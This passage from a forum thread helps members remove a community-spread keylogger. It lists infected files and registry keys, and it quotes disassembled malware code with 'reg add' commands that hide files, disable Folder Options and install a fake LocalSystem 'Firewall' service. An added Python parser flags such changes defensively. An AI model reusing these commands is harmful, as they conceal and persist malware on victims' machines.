Closed Thread
Page 9 of 9
Results 81 to 90 of 90

Thread: Removing Glennis Virus

  1. #81
    Have plane will travel Anticept's Avatar
    Join Date
    Feb 2008
    Location
    Ohio, USA
    Posts
    1,503

    Default Re: Removing Glennis Virus

    Guys, just move on. Glenni isn't anyone particularly special or impressive, all he did was use a script-kiddie method of gaining access to someone's computer. Few people fell for it, had a few laughs, woohoo, some people learned some lessons. He's not the first who has done it, he won't be the last.

    He's just an attention whore, if he posts, just report it. Don't feed the trolls.
    "You can only tie the record for flying low."

  2. #82
    Wire Noob bulldog533's Avatar
    Join Date
    Oct 2008
    Posts
    8

    Post Re: Removing Glennis Virus

    Quote Originally Posted by mmavipc View Post
    And if it is a good keylogger it hooks onto windows APIs and also listens for stuff typed by a virtual keyboard
    Ya that's true.
    I forgot about that.

  3. #83
    Wire Amateur The North's Avatar
    Join Date
    Aug 2008
    Location
    Berrien County, Michigan
    Posts
    84

    Default Re: Removing Glennis Virus

    Wow, I have missed so much in just a couple months, including a virus crisis. I hope all you guys are successful at removing the keylogger.
    Quote Originally Posted by MacerXGP View Post
    1: I have a reason. Ever heard of FUN?

  4. #84
    NOT A CUNT Ninja101's Avatar
    Join Date
    Dec 2008
    Location
    West Midlands, UK
    Posts
    637

    Default Re: Removing Glennis Virus

    Having run HijackThis on VM doing ye olde "Before and After" thingy. All files created are all listed, so you're all safe and almost sound :3
    Quote Originally Posted by Anticept View Post
    Heroes of Newerth

  5. #85
    Wirererer Vengeance's Avatar
    Join Date
    Feb 2009
    Location
    Australia
    Posts
    325

    Default Re: Removing Glennis Virus

    I got mine removed thanks for making this thread, although it really did fail.. on startup the virus will send a "dont send error report" :P

  6. #86
    Wirererer mmavipc's Avatar
    Join Date
    Jul 2009
    Posts
    100

    Default Re: Removing Glennis Virus

    Quote Originally Posted by mmavipc View Post
    Yay! I feel so happy! I'm the one who found proof first that it was a virus! But what worries me is, GMod lua can have html pages. These html pages can run java. Java can give you viruses. GMod is not virus protected?

    Edit: And oh yeah, Glenni is a giant dumbass(I know 5 ways how he could have made the virus extremely painful to delete)

    IT GETS INTO YOUR MSN MESSENGER TOO!
    C:\\WINDOWS\\system32\\dllcache\\tmp.exe is also part of the virus
    and C:\\WINDOWS\\system32\\dllcache\\temp.exe

    It also uses limewire to spread "windows_7full.scr"
    which is located in programfiles\\Shared\\

    Virus: C:\\WINDOWS\\system32\\drivers\\temp123.exe
    Virus : C:\\WINDOWS\\system32\\temp.exe
    Virus: recycler\\S-1-5-21-8749679017-0950430147-468708784-3200\\recycler.scr
    virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
    virus : C:\\WINDOWS\\system32\\dllcache\\myporn.scr
    virus: C:\\WINDOWS\\system32\\dllcache\\doc.pif
    virus: C:\\windows\\system32\\drivers\\svchost.exe (It's not normally there)
    virus : C:\\windows\\system32\\drivers\\tmpp.exe
    [tries to infect]
    virus: C:\\windows\\system32\\drivers\\tmpp.exe
    Check your C:\windows\explorer.exe for (-Two-Binded-Files-From-Nathan72389s-Free-Example-Binder-)
    virus: C:\\WINDOWS\\system32\\dllcache\\stub.exe
    virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
    All of your autorun.inf
    [/tries to infect]
    Virus : C:\\windows\\system32\\winlogon.scr
    Check your HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9.0\\Outlook\\Security for an entry called Level1Add. If it contains ".exe,.pif,.exe", delete it
    Check your HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa for an entry called UAC with a value of "C:\\WINDOWS\\system32\\dllcache\\svchost.exe". Delete it (It's not on my system)

    Check HKEY_CURRENT_USER\\Software\\Microsoft\\OLE for an entry called UAC with a value of "C:\\windows\\system32\\drivers\\svchost.exe". Delete it (it's not on my system)

    Check HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "Shell" DO NOT DELETE THIS! If it contains anything other than explorer.exe set the whole entire thing to "explorer.exe" DO NOT DELETE IT! THIS WOULD CAUSE YOUR SYSTEM TO MALFUNCTION

    HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "UIHost" What it should be: "logonui.exe"

    Virus : C:\\windows\\system32\\net.vbs
    Virus : C:\\windows\\system32\\launch.vbs
    Virus : C:\\windows\\system32\\launch.bat
    Check for C:\\windows\\system32\\logg.txt. PM me the contents (Remove any sensitive info like passwords, I'm not looking for that kind of shit) and then delete it

    virus : C:\\WINDOWS\\system32\\drivers\\Interop.MessengerAPI.dl
    virus : C:\\WINDOWS\\system32\\dllcache\\Interop.MessengerAPI.dll
    virus : C:\\WINDOWS\\system32\\pptemp.txt
    virus:C:\\windows\\system32\\tmp.dll

    Check your %windir%\\system32\\drivers\\etc\\hosts for any suspicious entries(like 127.0.0.1 antivir.de) Delete the entries but not the file

    Virus: %windir%\\system32\\13l.dll
    Virus : %windir%\\system32\\pbrl.vbs

    It also tries to send email to everyone with your Outlook with a message body of "Hello , could you take a look to my picture i have taken some days ago?" and a subject of "HEY". Delete any messages you get and tell your friends to delete those messages too

    That's all the settings it changes
    Code:
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"HideFileExt\" /t \"REG_DWORD\" /d 1 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"Hidden\" /t \"REG_DWORD\" /d 2 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFind\" /t \"REG_DWORD\" /d 1 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"SuperHidden\" /t \"REG_DWORD\" /d 0 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"ShowSuperHidden\" /t \"REG_DWORD\" /d 0 /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    PM me the contents of %windir%\\teemp.txt then delete it(remove sensitive info)

    Virus: %%t\\readme.scr

    Remove sensitive info from %windir%/tmp.log, PM me the contents and delete it

    Virus: C:\\start.exe
    Virus: %windir%\\temp.dat
    Virus: %%n\\windows_7_full.exe
    Virus: %windir%\\temp.dtx
    Virus: %%y\\windows_7_full.exe
    Virus: %windir%\\tam.dl

    It also adds user accounts

    Virus: %windir%\\teest.txt
    Check your netbios shared folders for funny.scr, and LOOL.pif delete them

    Virus: %%g\\%%v\\STUPID.scr
    Virus: %windir%\\input123.blp
    virus: %windir%\\teest.txt

    Check all of your p2p sharing programs

    virus: Microsoft\\Messenger\\porn_(Anything can be here, it's random).sc
    Virus: %windir%\\system32\\tomp.txt


    My laziness is going to let you figure out what this code does
    Code:
     ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"DisplayName\" /d \"Default Windows Firewall\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ObjectName\"  /d \"LocalSystem\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Start\" /t REG_DWORD /d \"2\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ErrorControl\" /t REG_DWORD /d \"0\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Type\" /t REG_DWORD /d \"110\" /f"
        callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
        ldloc.s 0xA
        ldstr "reg add  \"HKEY_CURRENT_USER\\Software\\Patchou\\Messenger Plus! Live\\GlobalSettings\\Scripts\\MSN PLUS\" /v background /d "
        ldarg.0
    If you use the autoit scripting language all of your include files are infected!

    Virus: %windir%\\system32\\sys.bat

    CHECK YOUR MIRC INI FILES

    Virus: %windir%\\ftp

    Tries to stop McAfee firewall

    Virus: C:\\windows\\system32\\s4c.vbs

    It tries to hijack skype

    Another attempt to hack messenger
    Code:
        ldstr "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\MessengerService\\Policies"
        ldstr "IMWarning"
        ldstr "(M)Warning: The person who you are talking to is infected with a virus. Send him the removal tool that can be found in"
        ldarg.0
    ldstr "HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\View\\YMSGR_buzz"
    ldstr "content url"
    Kill it

    In your temp files you'll have win_update.exe. DELETE it

    HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon Entry "UserInit" set it to "C:\\WINDOWS\\SYSTEM32\\Userinit.exe"

    And that's all I can get from server.exe
    If you have any of the other virus files handy upload them somewhere and PM me a link
    I do all this and do credit? Ahh w/e
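
Added example (not part of mmavipc's post or of the thread): a Python parser that turns the ldstr "reg add ..." literals from the disassembly quoted in post #86 into a list of registry changes, and flags a service whose ImagePath is an svchost.exe outside system32, which the post notes is "not normally there". The function names are hypothetical; the IL lines are copied from the post.

```python
import re
from ntpath import basename, dirname

# ldstr/callvirt lines copied from the disassembly in the post (not constructed).
IL_DUMP = r'''
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ObjectName\"  /d \"LocalSystem\" /f"
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Start\" /t REG_DWORD /d \"2\" /f"
'''

FLAGS = {"/v": "value", "/t": "type", "/d": "data"}

def parse_reg_adds(il_text):
    """Return one dict per `reg add` command found in IL ldstr literals."""
    changes = []
    for line in il_text.splitlines():
        m = re.match(r'\s*ldstr\s+"(.*)"\s*$', line)
        if not m:
            continue
        # Undo the string-literal escaping: \\ becomes \ and \" becomes "
        cmd = re.sub(r'\\(.)', r'\1', m.group(1))
        tokens = [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmd)]
        if len(tokens) < 3 or [t.lower() for t in tokens[:2]] != ["reg", "add"]:
            continue
        change = {"key": tokens[2], "value": None, "type": None, "data": None}
        for flag, arg in zip(tokens[3:], tokens[4:]):
            if flag.lower() in FLAGS:
                change[FLAGS[flag.lower()]] = arg
        changes.append(change)
    return changes

def masquerading_services(changes):
    """Flag service ImagePath values named svchost.exe outside system32/syswow64."""
    hits = []
    for c in changes:
        is_image = "\\services\\" in c["key"].lower() and (c["value"] or "").lower() == "imagepath"
        path = (c["data"] or "").lower()
        if is_image and basename(path) == "svchost.exe" and not dirname(path).endswith(("\\system32", "\\syswow64")):
            hits.append((c["key"].rsplit("\\", 1)[1], c["data"]))
    return hits

if __name__ == "__main__":
    changes = parse_reg_adds(IL_DUMP)
    for c in changes:
        print(c)
    print("suspicious services:", masquerading_services(changes))
```

The parsed list doubles as a cleanup checklist: each entry names the key and value to inspect on an affected machine.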

  7. #87
    has a custom title mattwd0526's Avatar
    Join Date
    Apr 2009
    Location
    Born Bostonian
    Posts
    2,652

    Default Re: Removing Glennis Virus

    We love you, we're just too embarrassed to admit it ;D

  8. #88
    Wire Sofaking SystemsLock's Avatar
    Join Date
    Mar 2009
    Posts
    474

    Default Re: Removing Glennis Virus

    Sorry if we didn't do you credit mmavipc. The information was extremely helpful.

    I agree with Anticept this was a piss-poor excuse for a virus, it seems luckily that not too many people were hit, and he barely did any damage at all. Nonetheless, however, it was fucking annoying.
    Make a Small Loan, Make a Big Difference - Check out Kiva.org to Learn How!

  9. #89
    Spucatum Tauri Bull's Avatar
    Join Date
    Jun 2008
    Location
    Finland
    Posts
    6,010

    Default Re: Removing Glennis Virus

    Quote Originally Posted by Anticept View Post
    Guys, just move on. Glenni isn't anyone particularly special or impressive, all he did was use a script-kiddie method of gaining access to someone's computer. Few people fell for it, had a few laughs, woohoo, some people learned some lessons. He's not the first who has done it, he won't be the last.

    He's just an attention whore, if he posts, just report it. Don't feed the trolls.
    QFT - Closed.
    Feel free to pm if you have something important to add to this thread, if not, let it die and stop feeding his "pride".
    Last edited by Bull; 12-01-2009 at 03:06 PM.
    My signature has a point.
    Quote Originally Posted by Squeakyneb View Post
    when l3ulletje says do it, do it.
    That

    Quote Originally Posted by Anticept View Post
    By the way, Bull is in charge.

  10. #90
    Developer Matte's Avatar
    Join Date
    Jan 2009
    Location
    Norway
    Posts
    3,109

    Default Re: Removing Glennis Virus

    Keyboard Tutorial.
    Keyboard tutorial - Page 1


    http://www.hackforums.net/showthread.php?tid=170170

    All he did was to batch the autorun file.... He's a master at this stuff.
    "If anybody says he can think about quantum physics without getting giddy, that only shows he has not understood the first thing about them."
    -- Niels Bohr
